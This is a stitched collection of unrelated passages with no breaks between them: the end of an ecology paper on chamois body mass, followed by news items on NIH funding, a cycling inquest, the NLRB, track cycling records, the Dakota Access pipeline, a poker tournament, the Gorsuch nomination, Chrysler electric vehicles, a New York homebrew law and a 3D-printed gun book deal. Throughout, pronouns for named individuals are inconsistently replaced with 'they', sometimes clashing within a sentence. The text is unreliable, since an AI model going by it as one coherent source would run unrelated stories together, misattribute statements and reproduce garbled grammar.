[71]-[73]. Previously, the importance of lagged effects on juvenile condition has been stressed (e.g. [56],[58]). However, our findings are consistent with recent work on juvenile chamois showing that environmental conditions during the second year of life, which influence the ability of juveniles to acquire resources directly, have an important effect on investment in growth and energy storage [37],[52]. Only in Brenta is there no evidence for density dependence in body mass (Figures 5 and 6). Brenta is calcareous, harbouring a more nutrient-rich plant community [74], so forage availability could be less limiting here than in the other populations. A hunting regime maintaining this population below its carrying capacity, and limiting the effect of resource competition on mass, could also contribute to the less pronounced mass declines observed in Brenta (Figure 1).
There was no evidence for a strong role of vegetation productivity or phenology in the observed long-term mass declines (Table 1, Figure 5). Given that NDVI is only a proxy for vegetation productivity, it remains possible that other changes in vegetation quality and phenology have had more of an effect than suggested here. As with overgrazing, it is possible that warmer temperatures in spring and summer could lead to increases in the abundance of less palatable species [75], or reductions in the protein content of the species present [76], changes which NDVI might not detect. Although they do not appear to play a strong role in mass declines, there is some evidence that vegetation productivity and phenology influence variation in juvenile body mass. This is particularly the case in the calcareous area, Brenta, where there is strong evidence that productive growing seasons (in terms of INDVI and maximum NDVI) have positive effects on juvenile body mass (Table 1, Figure 5). This is consistent with findings from another calcareous Alpine area, where long growing seasons have been linked to higher juvenile chamois body mass [52]. In our study, it is intriguing that the relative importance of environmental factors should vary among neighbouring areas that differ predominantly only in their geological substrate. These differences may arise because calcareous vegetation, whilst being more nutrient-rich, varies more in quality in response to environmental variation than siliceous vegetation [74],[77]. The variation in substrate in this study area has previously been shown to mediate differences in reproductive strategy, body mass [38] and horn length [37]; this study further highlights the importance of considering geological variation in studies of animal morphology, physiology and life history.
Railway Minister Suresh Prabhu listed a series of environment-friendly initiatives undertaken by the Railway Ministry. (File Photo)
Railway Minister Suresh Prabhu on Sunday made a strong pitch for controlling human population to tackle environmental issues and to reduce the pressure on natural resources caused by growing demand."Unless, globally we accept the fact that population is a challenge, we will not be able to actually solve the big issues we face...the type of economic demands that these number of people are going to make out of the planet...if the population goes down, the demand will go down," they said.Mr Prabhu made the remarks at an event organised in New Delhi by India Eye International Human Rights Observer and UN Information Centre for India and Bhutan to mark World Environment Day on Sunday.Mr Prabhu noted that there are some countries and certain sections of societies including those in India which enjoy natural resources "disproportionate" to their numbers."But at the same time, we must address the (population) demand side issue," they said and called for dealing with environmental issues in a "collaborative and co-operative" manner.Mr Prabhu also listed a series of environment-friendly initiatives undertaken by the Railway Ministry including use of solar energy and steps taken to save water. The Minister also presented environmental activist Sunita Narain a lifetime achievement award at the event, which was also attended by renowned water conservationist Rajendra Singh, film directors Madhur Bhandarkar and Ashoke Pandit, Parmarth Niketan Ashram president Swami Chidanand Saraswati and others.
Snow begins to gather on a statue outside the US Capitol Building in Washington, DC, December 10, 2013. Fresh winter snow moved into the US mid-Atlantic region on Tuesday, shutting schools and offices in the nation's capital and elsewhere as the mid-section of the US remained in the grip of Arctic air that showed no signs of easing. AFP PHOTO / Jim WATSON (Photo credit should read JIM WATSON/AFP/Getty Images)
WASHINGTON -- Around 6:30 p.m. on Wednesday, 150 or so people gathered in an otherwise empty National Press Club in downtown D.C.
Hours earlier, in the room down the hall, Sen. Ted Cruz (R-Texas) had drawn throngs of press during an appearance before the Hispanic Chamber of Commerce. Now, none remained. Instead, attendees still in their work attire sat around tables sipping wine and eating moderately moist chicken dinners, waiting to hear from the guest of the night, a doctor from the Boston Children's Hospital whom few in D.C. -- outside those walls -- knew of.
Dr. Frederick Alt, a 66-year-old Harvard professor of genetics, is responsible for some of the most consequential breakthroughs in cancer research. Sen. Ed Markey (D-Mass.), the keynote speaker who preceded Alt onstage, described them as a "luminary in the constellation of cancer fighters."
That night, Alt was receiving the Szent-Györgyi Prize from the National Foundation for Cancer Research for a twofold breakthrough. Decades ago, Alt upended conventional wisdom of human genome behavior when they discovered that cancer cells had the capacity to genetically amplify themselves, allowing them to spread, become more dangerous and resist treatments. From there, they discovered how chromosomes recognize the "machinery" that keeps their genomes stable -- a machinery that cancer cells lack. That led to a better understanding of how to protect DNA from the sort of critical damage caused by many cancers. It was research that another speaker called "foundational."
Now on the downward arc of their four-decade career, Alt could have been excused if, on Wednesday, they enjoyed a glass or two of wine and took their award in stride: the compliments of an organization whose mission aligns with their research. But the undertone of the evening's affair was more political, and more dour, than that.
Alt isn't just invested in understanding the genetics of cancer. He's preoccupied by the idea that the next generation of American scientists might not be there to take the baton he's passing.
"I think now is the worst I have ever seen it," they told The Huffington Post of the funding climate, hours before the award ceremony. "The biggest worry is that science as we've known it for the past many decades, where we are the leaders -- it is going to disappear if this keeps going.”
Dr. Alt received the Szent-Györgyi Prize from the National Foundation for Cancer Research Wednesday night.
Funding for the National Institutes of Health, the main federal spigot for biomedical research like Alt's, has bipartisan support among lawmakers. In recent weeks, a number of high-profile conservatives have called for investments in the NIH to be dramatically increased, and for Congress not to fret about cutting spending elsewhere to pay for it. But most people expect that when appropriators fund the government this fall, biomedical research will remain under-addressed.
This, advocates say, would prove catastrophic. Already, the NIH's spending capacity has dropped more than 20 percent over the past decade as the budget lines have failed to keep up with inflation or been reduced by policies like sequestration. The success rates for applicants have sunk into the teens, and the average age of first-time grant recipients has risen to 43 years old. Had the landscape been this bad when they were first pursuing their studies, Alt said, the possibility of their breakthroughs would have been dramatically diminished.
“It wouldn't have changed my goal of doing [cancer research] because I think when most of us went into it, we were just excited about doing it," they said. "I think where it would have changed the trajectory is there probably would have been a much lower chance of being able to jump into it and succeeding, and probably along the way, you would be out of it."
Alt entered the field of science for reasons unrelated to its financial stability. Before they turned 11, their father had died of prostate cancer and their mother of breast cancer. Alt, then a young kid from Appalachia, decided to understand and, if possible, conquer the disease that took them. Though their parents hadn't made it through elementary school, Alt found their way to Brandeis and, from there, to Stanford University's Department of Biological Sciences. They got their Ph.D. in 1977 studying the drug resistance of cancer cells. Along the way, they pinpointed the role played by genomic instability, providing a road map for developing new therapies.
“And a lot of people followed the road map and expanded it," Alt said. "There were tons of neuroblastoma and medulloblastoma and brain cancer patients that were treated because they had amplified genes, and people found that and they could go in and do [those treatments].”
The first NIH grant Alt received was in 1982. He's had that grant continuously ever since, often with several others supplementing it at the same time. All in all, they estimate that he's received between $20 million and $30 million in funding from the federal government during their career -- a large figure, certainly, but one likely dwarfed by the amount of medical savings their breakthroughs have made possible.
Alt counts themselves among the fortunate. He's had a second funding source outside the government: a $1 million-a-year-grant from the Howard Hughes Medical Institute. They also entered the field at a time of less competition, and was able to ride the wave of political support that came in the mid-'90s, when President Bill Clinton undertook a doubling of the NIH budget.
Today, they say, there are far fewer opportunities in the field, and the onset of brain drain is both evident and alarming. They themselves spend far more time applying for grant money than ever before.
"It is an incredibly discouraging time for a couple of reasons," said Alt. "Americans just don't see a future at this point in time in science, and it has happened pretty quickly. And the other thing that is real interesting is, I've always had a number of Chinese recruits in the lab, and they would end up getting good jobs at MIT and Stanford -- great places. Now, everybody who comes to my lab... they are going now to get their own labs back in China, because they feel there is a much better situation to get funding.”
Sen. Ed Markey (D-Mass.) speaks before the National Foundation for Cancer Research on Wednesday.
As a preamble to a night meant to reward scientific achievement, these comments were decidedly somber. And even amid the celebration Wednesday evening, there were notes of disquiet. As Markey spoke, they praised the dramatic advances that have been made in the field of cancer research -- advances that seemed implausible not too far back. Then they told a story from five years ago, when they and their wife attended a Nobel Prize dinner at the Swedish embassy the night before the winners flew off to Sweden to get their rewards. The room, Markey remembered, was intimate and small -- just six tables in total -- which gave attendees a chance to question the guests.
"How will we compete against the Indians and the Chinese for Nobel Prizes 30 or 40 years from now?" someone asked.
Image copyright Graham Robins Image caption Junior Heffernan reached speeds of 46.5mph (74.8kmph) prior to the crash
A keen amateur cyclist suffered fatal injuries when they crashed into an oncoming car while travelling at more than 40mph during a race, an inquest heard.
Junior Heffernan, 23, from Yelverton in Devon, was taking part in the Severn Bridge Road Race in March 2013.
The inquest heard they veered on to the wrong side of the road as they raced down a steep hill and struck the car.
The coroner recorded a conclusion of accidental death.
Hit the windscreen
The inquest in Flax Bourton, Somerset, heard Mr Heffernan was unable to rejoin the correct side of the road because it was packed with other cyclists, and so they attempted to ride around the oncoming vehicle.
But they were thrown onto the windscreen when the front wheel of their bike struck the car.
There was no other course of action available to Mr Thomas to avoid collision PC Louise Phipps, Avon and Somerset Police
The inquest heard Mr Heffernan had reached speeds of 46.5mph (74.8km/h) seconds before the crash.
Assistant coroner Terence Moore said: "It is fairly obvious to me that, on approaching the left-hand bend at the bottom of this decline, the lead riders began to slow slightly.
"The effect of these lead riders slowing is a knock-on effect. With that compression, Junior and another rider were moved out into the right-hand lane."
They said Mr Heffernan saw the car at the last moment and tried to "avoid a collision by veering to the right".
'Don't cross the road'
Nigel Thomas, who was driving the vehicle, said: "I saw two cyclists come out from the group and to my side of the road. I immediately braked and the first rider looked up and moved back into their lane.
"The second rider was not going to miss my car."
Mr Thomas was driving at about 15mph (24km/h), the inquest heard.
Roads are open to traffic during the race but the cyclists are positioned behind motorbikes and vans, which warn drivers of their presence.
Richard Jarrold, of Bristol Road Club, which promotes the race, said the full risk assessments had been carried out, the weather was fine and the road surface approaching the scene was "reasonable".
"The advice is you don't cross the road, you stay on the left-hand side of the road, but it is a race - that doesn't always occur," race organiser Brian O'Kelly said.
About 80 riders took part in the 41st Severn Bridge Road Race, which is a six-mile (10km) looped course around Olveston in South Gloucestershire.
Many Republicans have never been particularly fond of the NLRB and did their best to install business-friendly people to the five-member board. But until recently they accepted it as the nation's arbiter of workplace disputes in the never-ending balancing act between employer and labor. A certain someone said in 1985:
A free labor movement is essential to the preservation and expansion of free enterprise. Since its passage in 1935, the National Labor Relations Act has been a bulwark of support for this vital American heritage. A half-century ago, this law established the right of workers to organize and bargain collectively, should they choose to do so. Our system of peaceful industrial relations and the national labor policy that has evolved from the Act rest on this principle of free choice...In conducting union representation elections and processing unfair labor practice charges, the NLRB has helped build a peaceful industrial relations system that is a model for the free world. The processes of the board, as necessary today as they were 50 years ago, provide a forum and an orderly legal framework for resolving labor and management disputes. Truly, the NLRB has succeeded in fulfilling its mandate for America.
And who was this person? That flaming social democrat, Ronald Reagan.
Times have changed. The board began to slide into disarray at the end of the George W. Bush administration, when Senate Democrats, upset at the strong pro-employer tilt of the agency under Bush, left the board in 2007 with only two members, one from each party. But that didn't keep the agency from functioning: Under an unusual bipartisan deal, the remaining pair agreed to rule on cases they could agree on, leaving the rest in a burgeoning backlog. The Supreme Court later ruled that the rulings by the two-member board were illegitimate, leaving chaos in its wake and making it plain to future boards what the cost of an undermanned board would be.
From the start of the Obama administration, Republicans seized on the NLRB as a likely driver of their radical agenda. Never mind that Obama failed to push organized labor's top priority, the Employee Free Choice Act, when they had the chance in 2009. Never mind that even many employer-side lawyers have acknowledged that labor law in the country is outdated and in need of a serious overhaul. Never mind that unions' numbers have continued to dwindle during their tenure, making a mockery of McConnell's and others' warnings about the power of “Big Labor.” Never mind that the case that most infuriated Republicans—the NRLB general counsel's finding against Boeing's proposed move to nonunion South Carolina—was not issued by the full board and resulted in an eventual agreement between Boeing and the union. None of it has stopped Republicans from espying in even the most modest of rules issued by the board—requiring employers to post notice of workers' rights!—the second coming of Trotskyism.
As the paranoia about the agency ratcheted up, Senate Republicans simply stopped confirming Obama's nominees to the board, even though they held to the custom of naming two members from the minority party. Obama finally employed a controversial tactic to seat their nominees in a recess appointment. In January, the conservative-leaning D.C. Court of Appeals declared those appointments invalid, a ruling the administration has appealed to the Supreme Court, which will rule on the case next spring. Dozens of employers have seized on the appeals court ruling to declare that the many judgments that have been issued by the NLRB while the contested nominees are on board are null and void. Meanwhile, the board will be without a quorum of three members by the end of August, leaving it indisputably defunct. Obama recently submitted a full slate of five members to the Senate— again, three Democrats, two Republicans—but Republicans are vowing to filibuster them, arguing that the federal court ruling has rendered illegitimate the two Democratic nominees who were installed in the recess. But of course the recess appointments only came before the court in the first place because Republicans refused to allow them to come up for a vote. (McConnell has graciously offered to approve the Republican nominees and the third Democratic one, which would leave the board with a quorum -- a Republican-controlled one, as if there was not a Democratic president sitting in the White House.)
François Pervis smashed Arnaud Tournant's 12-year-old world record in the 1 kilometre time trial when they clocked a time of 56.303 seconds in the Track World Cup at Aguascalientes, Mexico on Sunday. Related Articles Pervis takes kilometre win
Latham, Pervis, O'Shea strike gold in Beijing
Meares breaks 500 metre time trial world record in Mexico
Pervis: I can go even faster
Luke Davison aiming for maiden omnium title
The Frenchman was one of five riders in the event to dip below Tournant's mark of 58.875, which they set at an altitude of 3,600m in La Paz, Bolivia in October 2001. For their part, Pervis availed of the 1,880m altitude of the Aguascalientes track to make the most of their current good form and set a new landmark time.
Pervis had already showcased their condition by breaking the world record in the flying 200 metres on Friday, and they were in imperious form in the kilometre on Saturday evening, averaging some 63.939kph to beat Maximilian Levy (Germany) into second place by over 1.5 seconds.
Levy broke Tournant's old mark by finishing second in 57.949, while Joachim Eilers (57.980), Eric Engler (58.369) and Hugo Haak (58.446) also all managed to break the former record but were unable to get close to Pervis.
Pervis had travelled to Mexico nurturing hopes of a record-breaking ride, as they told Ouest France before their departure. “I won't have many chances like this in my life, I'm very strong at the moment. Everything is in place, now is the time,” Pervis said. “And if I needed a sign, Aguascalientes is where I rode my first World Cup race, ten years ago.”
The kilometre record was not the only one to fall during the final day of the World Cup, as Kristina Vogel (Germany) set a new flying 200m world record in qualifying for the women's sprint. Vogel set a new mark of 10.384 seconds just moments after Anna Meares (Australia) had dipped below their 2012 record of 10.782 by clocking 10.487.
Meares established a new record in the 500 metre time trial on Friday, when they set a time of 32.836 and became the first woman to break the 33-second barrier in the event.
A federal judge ruled Wednesday that the environmental review for the Dakota Access pipeline was, in part, inadequate and must be reconsidered, handing tribal opponents of the 1,170-mile pipeline project a key legal victory.
But U.S. District Judge James Boasberg did not order pipeline operators to stop the oil that is already flowing through the project, saying they would need to consider that request in light of Wednesday's judgement.
Boasberg ruled that the federal government “substantially complied” with the federal environmental permitting law that governs projects such as Dakota Access, a $3.8 billion pipeline that can carry up to 570,000 barrels of oil per day.
ADVERTISEMENT
But, Boasberg wrote in a 91-page opinion, the Army Corps of Engineers “did not adequately consider the impacts of an oil spill on fishing rights, hunting rights, or environmental justice, or the degree to which the pipeline's effects are likely to be highly controversial.”
They ruled that the Army Corps, which permitted the project, would need to conduct a new review of Dakota Access that considers those factors.
But Boasberg did not order Dakota Access to cease operations, which have been underway since June 1. They said that is a “separate question” that they will consider in the future.
Two tribes, the Standing Rock Sioux and Cheyenne River Sioux, have tried for months to halt the Dakota Access project. They argue the pipeline, which crosses the Missouri River upstream from the Standing Rock Indian Reservation in North Dakota, threatens water quality there.
Courts have rejected two previous arguments against the pipeline: that it violates the tribes' religious liberty by flowing under sacred water in North Dakota and that its construction threatened cultural heritage sites on the Great Plains.
The tribes have long argued the project needs to undergo a more thorough environmental review before it could transport crude from the Bakken oil fields to terminals in Illinois.
The Army Corps said last summer that it would grant the permits necessary to build the project, but opponents said the pipeline needed to go through a more rigorous Environmental Impact Statement (EIS) review first.
The Obama administration agreed. Last year, officials refused to issue a construction permit for the segment of the project that runs along federal land, opting instead to kick off a potentially lengthy EIS review.
President Trump in January reversed that decision, signing a presidential order to build the pipeline. Regulators issued construction permits in February and oil began flowing through the completed pipeline earlier this month.
Boasberg ruled that part of the original permitting decision that cleared the way for the pipeline was inadequate, as the tribes had insisted.
“The agency failed to adequately consider the impacts of an oil spill on Standing Rock's fishing and hunting rights and on environmental justice, and in February 2017, it did not sufficiently weigh the degree to which the project's effects are likely to be highly controversial in light of critiques of its scientific methods and data,” they wrote.
But Boasberg defended many of the federal decisions that went into permuting the project, saying the Army Corps “substantially complied with [the National Environmental Policy Act] in many areas.”
They also rejected the tribes' argument that Trump's decision that allowed the project to move forward was illegal.
Boasberg has scheduled a briefing next week to determine what happens next, including hearing tribal arguments that oil should stop running through the pipeline while regulators reconsider the project's permits.
Standing Rock Sioux Chairman Dave Archambault hailed the decision as a “major victory” in a statement Wednesday.
“We applaud the courts for protecting our laws and regulations from undue political influence, and will ask the Court to shut down pipeline operations immediately,” they said.
Official Goliath Poker Tournament 2018 | Grosvenor Casinos
Goliath Tournament Dates 2018
Where: Grosvenor Casino, Ricoh Arena, Coventry.
When: 26th July to 5th August 2018.
What is the Goliath Tournament?
The Goliath is a massive poker event held every year at the Ricoh Arena, Coventry. The Event consists of a myriad of side events, including events hosted by Grosvenor Casinos partners, APAT and Redtooth. The main event has a £125 buy-in, with huge prize pools.
The Main Event in 2017 saw a massive 6,385 entries and a £638,500 prizepool.
The eventual winner Elliot Marais turned their £120 buy-in into £85,760.
This year has a guaranteed first prize of £100,000, along with an estimated prizepool of £750,000.
Previous Events
Every year, the Goliath gets bigger and better. More side events, more cash games, more players and more fun. Check out how the Goliath has grown over the years.
What to expect
Expect a poker experience that's closer to Las Vegas than anything else in Europe. A huge casino, with thousands of like-minded, fun-loving players and the opportunity to win a life changing sum for a reasonably small buy-in awaits.
What you won't get is silent tables, there are plenty of other events for die-hard serious players. The Goliath is a fun event, tailored for the enjoyment of amateur players. A wide variety of side games, action-packed cash games and activities on-site make this an event players enjoy coming back to year after year.
How to Qualify for Goliath – Satellite Tournaments
1,621 players tried to qualify via online satellites in 2017, with 604 players pre-registering online. These wily players not only qualified for a fraction of the price, but avoided queuing at the event.
With 750 seats guaranteed and qualification possible from £0.25p, give the satellites on grosvenorpoker.com a go and qualify for all your favourite live events for pennies.
Goliath 2018 dates are now set as 26th July- 5th.
GOLIATH Satellite Schedule Day Date Time Buy-in Seats GTD Thursday 03 May 2018 9pm (1hr LR) £5 R/A 5 Sunday 06 May 2018 7pm (1hr LR) £30 Freeze 5 Thursday 10 May 2018 9pm (1hr LR) £5 R/A 5 Sunday 13 May 2018 7pm (1hr LR) £30 Freeze 5 Thursday 17 May 2018 9pm (1hr LR) £5 R/A 5 Sunday 20 May 2018 7pm (1hr LR) £30 Freeze 5 Thursday 24 May 2018 9pm (1hr LR) £5 R/A 5 Sunday 27 May 2018 7pm (1hr LR) £30 Freeze 5 Thursday 31 May 2018 9pm (1hr LR) £5 R/A 5 Sunday 03 June 2018 7pm (1hr LR) £30 Freeze 5 Thursday 07 June 2018 9pm (1hr LR) £5 R/A 5 Sunday 10 June 2018 7pm (1hr LR) £30 Freeze 5 Thursday 14 June 2018 9pm (1hr LR) £5 R/A 5 Sunday 17 June 2018 7pm (1hr LR) £30 Freeze 5 Thursday 21 June 2018 9pm (1hr LR) £5 R/A 5 Sunday 24 June 2018 7pm (1hr LR) £30 Freeze 5 Thursday 28 June 2018 9pm (1hr LR) £5 R/A 5 Sunday 01 July 2018 9pm (1hr LR) £30 Freeze 30 Monday 02 July 2018 9pm (1hr LR) £5 R/A 10 Tuesday 03 July 2018 9pm (1hr LR) £5 R/A 10 Wednesday 04 July 2018 9pm (1hr LR) £30 Freeze 10 Thursday 05 July 2018 9pm (1hr LR) £5 R/A 10 Friday 06 July 2018 7pm (1hr LR) £30 Freeze 10 Saturday 07 July 2018 9pm (1hr LR) £5 R/A 10 Sunday 08 July 2018 9pm (1hr LR) £30 Freeze 15 Monday 09 July 2018 9pm (1hr LR) £5 R/A 15 Tuesday 10 July 2018 9pm (1hr LR) £5 R/A 15 Wednesday 11 July 2018 9pm (1hr LR) £30 Freeze 15 Thursday 12 July 2018 9pm (1hr LR) £5 R/A 15 Friday 13 July 2018 7pm (1hr LR) £30 Freeze 15 Saturday 14 July 2018 9pm (1hr LR) £5 R/A 15 Sunday 15 July 2018 9pm (1hr LR) £30 Freeze 25 Monday 16 July 2018 9pm (1hr LR) £5 R/A 25 Tuesday 17 July 2018 9pm (1hr LR) £5 R/A 25 Wednesday 18 July 2018 9pm (1hr LR) £30 Freeze 25 Thursday 19 July 2018 9pm (1hr LR) £5 R/A 25 Friday 20 July 2018 7pm (1hr LR) £30 Freeze 25 Saturday 21 July 2018 9pm (1hr LR) £5 R/A 25 Sunday 22 July 2018 7pm (1hr LR) £30 Freeze 50 Monday 23 July 2018 9pm (1hr LR) £5 R/A 30 Tuesday 24 July 2018 9pm (1hr LR) £5 R/A 30 Wednesday 25 July 2018 9pm (1hr LR) £30 Freeze 30 Thursday 26 July 2018 9pm (1hr LR) £5 R/A 30
Accommodation
For accommodation enquiries to the 2018 event please visit https://www.maineventtravel.com/tours/tour/30
Preparation
Check out what our pros had to say about last year's event:
In the meantime
In the meantime, why not try out other great events held in Grosvenor Casinos up and down the country. The GUKPT tour is the longest running, most prestigious tour in the UK, with life-changing sums on offer. The 25/25 is another nationwide tour, with a slightly lower buy-in. Qualify for both with awesome satellites, only at Grosvenor Poker online.
View all poker promotions
Today, HRC announced its opposition to President Trump's nomination of Judge Neil Gorsuch to the Supreme Court of the United States.
“Never in the history of our movement have we had more at stake as a community, or as a country,” said HRC President Chad Griffin. “Since the moment they stepped foot in the Oval Office, President Trump has attacked equality. They have signed executive orders that undermine our country's most cherished values and appointed anti-LGBTQ cabinet nominees who have spent their careers undermining civil rights. And now, they have nominated Judge Gorsuch to the Supreme Court, fulfilling their campaign promise to nominate a justice in the mold of Antonin Scalia, one of the most vehemently anti-LGBTQ justices to ever sit on the court who once went so far as to compare gay people to murderers. The Supreme Court has played a central role in advancing the promise of equality for LGBTQ Americans, and Judge Gorsuch's anti-equality record -- from opposing crucial medical treatment for a transgender person to supporting a license to discriminate for private corporations -- make them unfit to sit on the nation's highest court. We cannot afford a justice who will roll back our rights, or who will be a rubber stamp for Donald Trump's unconstitutional actions. And America cannot afford to have Judge Gorsuch on the Supreme Court. We oppose this nomination.”
Gorsuch has a long and troubling career opposing civil rights, including for LGBTQ people:
Gorsuch called marriage equality part of the liberal social agenda, saying, “American liberals have become addicted to the courtroom… as the primary means of effecting their social agenda on everything from gay marriage to assisted suicide…”
They joined the Tenth Circuit's decision in Hobby Lobby v. Sebelius, which asserted that that some private corporations are “people” under federal law and have a right to deny basic healthcare coverage if it violates their religious belief. This expansive ruling could allow employers to deny transgender employees access to hormone treatment, access to birth control and other crucial health care for LGBTQ people.
Hobby Lobby could have negative long-term consequences beyond health care for the LGBTQ community. There are those who are already trying to use the decision to support discrimination against LGBTQ workers.
In 2015, Gorsuch joined a ruling against a transgender woman who was denied consistent access to hormone therapy while incarcerated. The ruling dismissed the prisoner's claims that the denial of care amounted to cruel and unusual punishment under the U.S. Constitution.
They have advocated for eliminating Chevron deference, a critical administrative law doctrine that allows our federal system of regulations to function, which could result in the significant loss protections for LGBTQ people.
Given this record, HRC has taken the extraordinary step of opposing this Supreme Court nominee prior to their confirmation hearing -- a first for the organization. Donald Trump used recommendations from the Heritage Foundation, a staunchly conservative and anti-equality think tank, to create a shortlist of candidates for the seat on the Court -- an organization that has fought every LGBTQ equality case that has come before the Supreme Court. Judge Gorsuch's record, coupled with Trump's discriminatory executive actions, their other, troubling appointees, and the campaign promise to appoint a justice in the mold of Antonin Scalia leaves no room for us to doubt that their pick will be negative for the LGBTQ community.
We cannot afford a Supreme Court justice who will be a rubber stamp for Donald Trump's horrific actions. And because so many of the LGBTQ community's hard-fought rights have been secured in the nation's highest court:
Romer v. Evans (1996) which stopped states from forbidding nondiscrimination protections for LGBTQ people
Lawrence v. Texas (2003) invalidated laws criminalizing same-sex relationships
United States v. Windsor (2013) required federal recognition of same-sex marriages
Obergefell v. Hodges (2015) brought nationwide marriage equality to every state
HRC opposes Judge Gorsuch's nomination to the Supreme Court. We have no reason to believe they will be an advocate for LGBTQ Americans, and we urge senators to vote “no.”
NEW YORK (CNNMoney.com) -- Chrysler is pinning a huge part of its future on a plan to produce a full line of electric vehicles, at a reasonable cost to both the carmaker and the consumer.
While General Motors is moving ahead with its Volt electric midsized car, Chrysler says it already has plans in place, not just for electric cars, but also for minivans and even off-road vehicles.
Chrysler's strategy hinges on keeping it cheap. The carmaker will dispense with flashy designs in exchange for low cost and flexibility. And it plans to pile on more electric-powered models quickly once the program launches in 2010.
"We aren't a one-electric-vehicle company," Lou Rhodes, Chrysler's vice president for advanced vehicle engineering, told CNNMoney in an exclusive interview.
Rhodes is also president of Chrysler's ENVI, a separate business division tasked with bringing new electric vehicles to market.
Instead of making one, or just a few, electric-only models, Chrysler will sell the same models in both gasoline-powered and electric-powered versions. This low-cost, high-variety electric-vehicle strategy will play a big part in any comeback plan Chrysler may present in hopes of getting government rescue funding.
Chrysler's strategy substantially cuts costs, Rhodes said, and it reduces the risk of entering uncharted market territory. That will translate into lower costs and more choices for customers.
If gas prices stay low, Chrysler factories will produce more gasoline powered models. If gas prices rise, factories can start rapidly turning out more electric cars since the models are essentially the same.
Chrysler's first electric vehicles will be based on current vehicles. The carmaker hasn't yet announced what the first model will be but, based on prototypes Chrysler revealed in September, it will likely be a minivan, a Jeep Wrangler 4X4 or a 2-seat sports car built in a Lotus body.
At least some of Chrysler's products will be extended-range electric vehicles, like GM (GM, Fortune 500)'s Volt. Because the car's body will not have been designed around optimal weight and aerodynamics, the Chrysler vehicle will need a more powerful electric drive system to provide performance similar to the Volt's. For instance, Chrysler promises the same 40-mile all-electric plug-in range as the Volt. (After that, a small gasoline engine will start up to produce more electricity as the car drives.) But the heavier Jeep prototype has a 27-kilowatt-hour (KwH) battery back compared to the Volt's 16 KwH pack.
Round two
Chrysler's second-generation electric vehicles, which the carmaker plans to start rolling out between 2012 and 2015, will be engineered from the wheels up to use either gasoline or electric power.
No matter which drivetrain the customer chooses, the vehicles will not be compromised, Rhodes insists.
"If you know what you want to achieve up front, you can certainly design that flexibility in up front," they said.
Electric cars will not have useless transmission tunnels running along the center of the floor, they said. If a rear-wheel-drive gasoline car needs that, a different floor will be used when that version is built.
The electric power systems are also being engineered for maximum flexibility, Rhodes said. Bigger, heavier vehicles take more power to move, whether that power is from gasoline or batteries. For gasoline-powered cars, engineers have to design larger and smaller engines for different uses. A small Jeep Compass, for instance, gets a 2.4-liter 4-cylinder engine while a Jeep Commander SUV can come equipped with a 5.7-liter V8 engine.
But what if going to a larger engine was as simple as just plugging in more cylinders? Chrysler's electric drivetrains will work something like that. To hold more battery power, larger vehicles will simply get more battery cells. The cells themselves will be exactly the same whether in large or small vehicles. That's important because batteries are the biggest expense of creating an electric car.
"The real economy is in the cells," said Rhodes.
Likewise, the electric motor will be the same. It will just be up-sized for bigger jobs.
"All we change is the length of the rotor and the number of windings to span between different power outputs," Rhodes said.
Even the housing that goes around the motor will be same regardless of the size of the motor . The magnesium housing will be so lightweight that it simply won't be worth the added cost of creating smaller housings for the downsized motors, Rhodes said.
Electric cars aren't just a side-show or a public relations move for Chrysler, Rhodes insists, but a major strategic move. Through its GEM (Global Electric Motorcars) subsidiary, Chrysler already claims to be the largest seller of electric vehicles in the U.S. But those are so-called "Neighborhood Electric Vehicles," ultra-light cars with a top speed limited to 25 miles per hour. Chrysler claims sales of 40,000 GEM cars over the last 10 years. With its new plan, Chrysler plans to produce over 500,000 electric vehicles by 2013.
"This is going to be a big deal for Chrysler," they said.
Governor Andrew M. Cuomo today signed legislation to aid in the expansion of "homebrew" beer, wine and cider-making in New York.
This bill (S.1227B/A1100B) allows for the creation and operation of custom beer, wine, and cider production centers that will rent space and equipment to those looking to produce beer, wine, or cider for home consumption.
"The craft beverage industry has taken this state by storm, and more and more New Yorkers want to try their hand at making the next great Empire State beer, wine, or cider," Governor Cuomo said. "This new law builds upon this increased interest, supports local agriculture, and breaks down artificial barriers to allow innovation and creativity to flow."
New York's craft beverage industry is one of the fastest growing in the nation, however many urban and suburban residents often cannot afford or do not have access to the appropriate space or equipment to make homemade beer, cider, or wine in their homes or apartments. These custom production centers not only provide space and lower the overhead costs of production, but they also provide amateur brewers and wine and cider makers with the local ingredients and expert training needed when first starting out.
The new custom beer, wine and cider production centers will be regulated by the State Liquor Authority.
Senator David Carlucci said, "Providing places in the community for people with shared interests to come together has always been important to me. The creation of these custom centers will allow neighbors to receive training and share equipment. New York's beer, wine, and cider industry is blossoming, and this legislation will allow the talent pool to thrive. Moreover, the bill will have a positive effect on the agricultural industry in New York State, as more producers will look to use locally-grown grapes, apples, hops, and barley. I thank Governor Cuomo for signing this important bill into law."
Assembly Agriculture Committee Chair Bill Magee said, "This opens the door to allow hobbyists, farmers, students, and aficionados of craft beverage brewing to partake in small scale production in a custom center, fully equipped with all the amenities of the trade. Not only will this increase interest in craft brewing and wine making, it will benefit sales of New York agricultural products used in wine and beer production, while creating a new market base for the newly licensed custom crush facilities."
Building on Prior Industry Reforms to Grow New York's Economy
These laws build on the progress made by the Governor over the past five years to strengthen the craft beverage industry. Since 2011, the state has implemented a multitude of significant reforms and expanded programs to grow the craft beverage industry, including creating new farm-based manufacturing licenses, launching a $60 million statewide promotional campaign and hosting wine, beer and spirits summits across the state.
In just the past year, Governor Cuomo has signed legislation to modernize the Alcoholic Beverage Control Law by allowing for the sale of alcoholic beverages at on-premises establishments before noon on Sunday, as well as enabling farm wineries, breweries and cideries to sell any New York-made farm alcoholic beverage by the glass at their production facility or off-site branch store.
Under the leadership of Governor Cuomo, New York is now home to over 500 farm wineries, breweries, distilleries and cideries. The number of farm wineries in New York has increased by over 60 percent, from 195 in 2010 to 315 today while the number of farm distilleries grew from just 10 in 2010 to 95 today. Two new licenses have been created since 2011: the farm brewery license in 2013 and the farm cidery license in 2014, with New York now home to 129 farm breweries and 22 farm cideries businesses.
When Cody Wilson published the blueprint for the first fully 3D-printable gun on the web last spring, the controversy around that digital weapon led to its being downloaded 100,000 times in two days. Now Simon & Schuster is hoping the same sort of buzz can sell books.
Wilson, who leads the 3D-printed gun group Defense Distributed, signed a quarter-million dollar deal with Simon & Schuster's Gallery imprint in December to write a non-fiction book chronicling their quest to create the first fully 3D-printable lethal weapon. Though Wilson says the book won't be a "philosophical treatise," they tell me he'll use the opportunity to fully explain their ideological motivations for creating a deadly firearm anyone can download and print in the privacy of their garage.
